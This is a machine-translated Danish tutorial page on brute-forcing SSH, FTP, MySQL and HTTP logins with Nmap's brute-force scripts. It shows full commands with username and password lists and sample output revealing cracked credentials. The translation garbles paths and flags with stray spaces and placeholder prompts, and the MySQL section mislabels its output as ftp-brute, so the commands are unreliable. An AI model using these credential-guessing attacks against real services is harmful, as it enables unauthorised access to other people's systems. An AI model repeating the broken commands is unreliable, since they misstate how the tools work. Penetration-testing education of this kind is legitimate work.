Nmap

Adgangskode, der tvinges ved hjælp af Nmap

Adgangskode, der tvinges ved hjælp af Nmap
Til brute-force onlinetjenester bruger folk normalt Hydra, Medusa og Metasploit Framework, men Nmap kan også bruges til at brute-force en masse onlinetjenester. Der er indbyggede Nmap-scripts, der understøtter FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP og andre forskellige tjenester. Du kan også hæmme HTTP-formbaserede, grundlæggende og fordøje godkendelsesmetoder. Hvis du har Nmap installeret, kan du se disse scripts i mappen "/ usr / share / nmap / scripts".

[email protected]: ~ $ sudo apt update && sudo apt upgrade
[e-mail-beskyttet]: ~ $ sudo apt install nmap -y
[e-mail-beskyttet]: ~ $ cd / usr / share / nmap / scripts /
[e-mail-beskyttet]: ~ $ ls * brute *

I denne vejledning undersøger vi, hvordan vi kan bruge Nmap til et brutalt kraftangreb.

SSH Brute-Force

SSH er en sikker fjernadministrationsprotokol og understøtter openssl & adgangskodebaseret godkendelse. For at tvinge SSH-adgangskodebaseret godkendelse kan vi bruge “ssh-brute.nse ”Nmap-script.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-brute.nse

Send brugernavn og adgangskodeliste som et argument til Nmap.

[e-mail-beskyttet]: ~ $ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb = brugere.txt, passdb = adgangskoder.txt
Start af Nmap 7.70 (https: // nmap.org) kl. 2020-02-08 17:09 PKT
Nmap scanningsrapport for 192.168.43.181
Værten er op (0.00033s latenstid).
HAVNSTATSSERVICE
22 / tcp åben ssh
| ssh-brute:
| Konti:
| admin: p4ssw0rd - Gyldige legitimationsoplysninger
| _ Statistik: Udført 99 gæt på 60 sekunder, gennemsnitlig tps: 1.7
Nmap færdig: 1 IP-adresse (1 vært op) scannet i 60.17 sekunder

FTP Brute-Force

FTP er en File Transfer Protocol, der understøtter adgangskodebaseret godkendelse. For at brute-force FTP bruger vi “ftp-brute.nse ”Nmap-script.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-brute.nse

Send brugernavn og adgangskodeliste som et argument til Nmap.

[e-mail-beskyttet]: ~ $ nmap --script ftp-brute -p21 192.168.43.181 - script-args
userdb = brugere.txt, passdb = adgangskoder.txt
Start af Nmap 7.70 (https: // nmap.org) kl. 2020-02-08 16:51 PKT
Nmap scanningsrapport for 192.168.43.181
Værten er op (0.00021s ventetid).
HAVNSTATSSERVICE
21 / tcp åben ftp
| ftp-brute:
| Konti:
| admin: p4ssw0rd - Gyldige legitimationsoplysninger
| _ Statistik: Udført 99 gæt på 20 sekunder, gennemsnitlig tps: 5.0
Nmap færdig: 1 IP-adresse (1 vært op) scannet i 19.50 sekunder

MYSQL Brute-Force

Nogle gange er MySQL åben for eksterne forbindelser og giver alle mulighed for at oprette forbindelse til det. Dens adgangskode kan knækkes ved hjælp af Nmap med "mysql-brute" script.

[e-mail beskyttet]: ~ $ sudo nmap - script mysql-brute -p3306 192.168.43.181
--script-args userdb = brugere.txt, passdb = adgangskoder.txt
Start af Nmap 7.70 (https: // nmap.org) kl. 2020-02-08 16:51 PKT
Nmap scanningsrapport for 192.168.43.181
Værten er op (0.00021s ventetid).
HAVNSTATSSERVICE
3306 / tcp åben mysql
| ftp-brute:
| Konti:
| admin: p4ssw0rd - Gyldige legitimationsoplysninger
| _ Statistik: Udført 99 gæt på 20 sekunder, gennemsnitlig tps: 5.0
Nmap færdig: 1 IP-adresse (1 vært op) scannet i 19.40 sekunder

HTTP Brute-Force

HTTP bruger tre typer godkendelse til at godkende brugere til webservere. Disse metoder bruges i routere, modemer og avancerede webapplikationer til at udveksle brugernavne og adgangskoder. Disse typer er:

Grundlæggende godkendelse

I grundlæggende HTTP-godkendelsesprotokol koder browseren brugernavn og adgangskode med base64 og sender det under "Autorisation" -overskrift. Du kan se dette i følgende skærmbillede.

Autorisation: Grundlæggende YWRtaW46YWRtaW4 =

Du kan base64 afkode denne streng for at se brugernavnet og adgangskoden

[e-mail-beskyttet]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -d
admin: admin

Grundlæggende HTTP-godkendelse er usikker, fordi den sender både brugernavn og adgangskode i almindelig tekst. Enhver Man-in-the-Middle Attacker kan let opfange trafikken og afkode strengen for at få adgangskoden.

Fordøjelsesgodkendelse

HTTP Digest Authentication bruger hashing-teknikker til at kryptere brugernavnet og adgangskoden, før det sendes til serveren.

Hash1 = MD5 (brugernavn: realm: password)
Hash2 = MD5 (metode: digestURI)
respons = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Du kan se disse værdier under overskriften "Autorisation".

Fordøjelsesbaseret godkendelse er sikker, fordi adgangskoden ikke sendes i almindelig tekst. Hvis en Man-in-the-Middle angriber opfanger trafikken, kan han ikke få adgangskoden til almindelig tekst.

Formbaseret godkendelse

Grundlæggende og fordøjelsesgodkendelser understøtter kun overførsel af brugernavn og adgangskode, mens formbaseret godkendelse kan tilpasses efter brugerens behov. Du kan oprette din egen webside i HTML eller JavaScript for at anvende dine egne kodnings- og overførselsteknikker.

Normalt sendes data i formbaseret godkendelse i almindelig tekst. Af sikkerhedsmæssige årsager skal der anvendes HTTP'er for at forhindre Man-in-the-Middle-angreb.

Vi kan brutalt tvinge alle typer HTTP-godkendelse ved hjælp af Nmap. Vi bruger scriptet "http-brute" til dette formål.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-brute.nse

For at teste dette Nmap-script løser vi en offentligt hostet brute-force-udfordring fra pentester academy på denne URL http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Vi er nødt til at levere alt inklusive værtsnavn, URI, anmodningsmetode og ordbøger separat som et scriptargument.

[e-mail-beskyttet]: ~ $ sudo nmap -p80 - script http-brute pentesteracademylab.appspot.com
--script-args http-brute.værtsnavn = pentesteracademylab.appspot.com,
http-brute.sti = / lab / webapp / basicauth, userdb = brugere.txt, passdb = adgangskoder.txt,
http-brute.metode = POST
 
Start af Nmap 7.70 (https: // nmap.org) kl. 2020-02-08 21:37 PKT
Nmap scanningsrapport for pentesteracademylab.appspot.com (216.58.210.84)
Værten er op (0.20s ventetid).
Andre adresser til pentesteracademylab.appspot.com (ikke scannet): 2a00: 1450: 4018: 803 :: 2014
rDNS-rekord for 216.58.210.84: mct01s06-i-f84.1e100.net
 
HAVNSTATSSERVICE
80 / tcp åben http
| http-brute:
| Konti:
| admin: aaddd - Gyldige legitimationsoplysninger
| _ Statistik: Udført 165 gæt på 29 sekunder, gennemsnitlig tps: 5.3
Nmap færdig: 1 IP-adresse (1 vært op) scannet i 31.22 sekunder

Konklusion

Nmap kan bruges til at gøre en masse ting på trods af simpel havnescanning. Det kan erstatte Metasploit, Hydra, Medusa og mange andre værktøjer, der er lavet specielt til onlinebrutforcering. Nmap har enkle, brugervenlige indbyggede scripts, der tvinger næsten alle tjenester, inklusive HTTP, TELNEL, SSH, MySQL, Samba og andre.

Mus Museklik på venstre museknap fungerer ikke på Windows 10
Museklik på venstre museknap fungerer ikke på Windows 10
Hvis du bruger en dedikeret mus med din bærbare computer eller stationære computer, men musens venstre-klik-knap fungerer ikke på Windows 10/8/7 af en...
Mus Markøren hopper eller bevæger sig tilfældigt, mens han skriver i Windows 10
Markøren hopper eller bevæger sig tilfældigt, mens han skriver i Windows 10
Hvis du finder ud af, at din musemarkør hopper eller bevæger sig alene, automatisk tilfældigt, mens du skriver Windows-bærbar computer eller computer,...
Mus Sådan vender du musens og touchpadsens rulle retning i Windows 10
Sådan vender du musens og touchpadsens rulle retning i Windows 10
Mus og Touchpads gør ikke kun computing let, men mere effektiv og mindre tidskrævende. Vi kan ikke forestille os et liv uden disse enheder, men det er...